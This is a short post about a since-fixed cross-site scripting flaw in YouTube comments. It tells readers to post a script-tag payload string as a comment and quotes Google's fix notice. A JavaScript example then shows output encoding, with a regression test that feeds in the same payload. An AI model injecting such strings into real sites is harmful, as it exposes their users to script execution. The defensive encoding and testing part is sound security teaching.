Cross-site scripting on YouTube
An XSS vulnerability in YouTube's comment processing allows an attacker to execute arbitrary scripts in the security context of the site.
Go to YouTube. Choose any video. Add the following script:
[php]<script>IF_HTML_FUNCTION?<h1><marquee><font color="red"><u>add your comment here<script>[/php]
Update (1): It is better to stay away from YouTube until they fix the vulnerability, or at least to log out of YouTube if you use it.
Update (2): Google has announced that the vulnerability has now been fixed:
We took swift action to fix a cross-site scripting (XSS) vulnerability on youtube.com that was discovered several hours ago. Comments were temporarily hidden by default within an hour, and we released a complete fix for the issue in about two hours. We’re continuing to study the vulnerability to help prevent similar issues in the future.
You can find the statement here.
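The usual defence for this class of bug is to encode comment text on output. The following is an added example, not code from this post or from YouTube: it renders the comment string shown above through an unencoded template and an encoded one, and checks each result for surviving markup. The function names, the `<div class="comment">` template and the benign sample comments are assumptions made for illustration.

```javascript
// Added example; helper names and the template are hypothetical, not YouTube's code.
const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

// Encode every HTML metacharacter so the browser treats the comment as text.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// "Before": comment text concatenated into the page unchanged.
function renderCommentUnsafe(comment) {
  return '<div class="comment">' + comment + "</div>";
}

// "After": the same template with the comment encoded on output.
function renderComment(comment) {
  return '<div class="comment">' + escapeHtml(comment) + "</div>";
}

// Regression check: remove the known wrapper, then report whether any
// tag opener ("<" followed by a letter, "/" or "!") survives in the body.
function containsRawMarkup(rendered) {
  const body = rendered
    .replace(/^<div class="comment">/, "")
    .replace(/<\/div>$/, "");
  return /<[a-zA-Z\/!]/.test(body);
}

// The comment string from the post above, used as test input.
const POST_PAYLOAD =
  '<script>IF_HTML_FUNCTION?<h1><marquee><font color="red"><u>add your comment here<script>';

// Constructed benign comments that must stay readable after encoding.
const BENIGN = ["2 < 3 && 5 > 4", 'He said "nice video"'];

// Run one renderer over all samples; true means raw markup reached the page.
function audit(render) {
  return [POST_PAYLOAD, ...BENIGN].map((c) => containsRawMarkup(render(c)));
}

console.log("unencoded:", audit(renderCommentUnsafe));
console.log("encoded:  ", audit(renderComment));
```

A check like `audit` can run as a regression test against the real comment template, so that a later change which drops the encoding step fails the build.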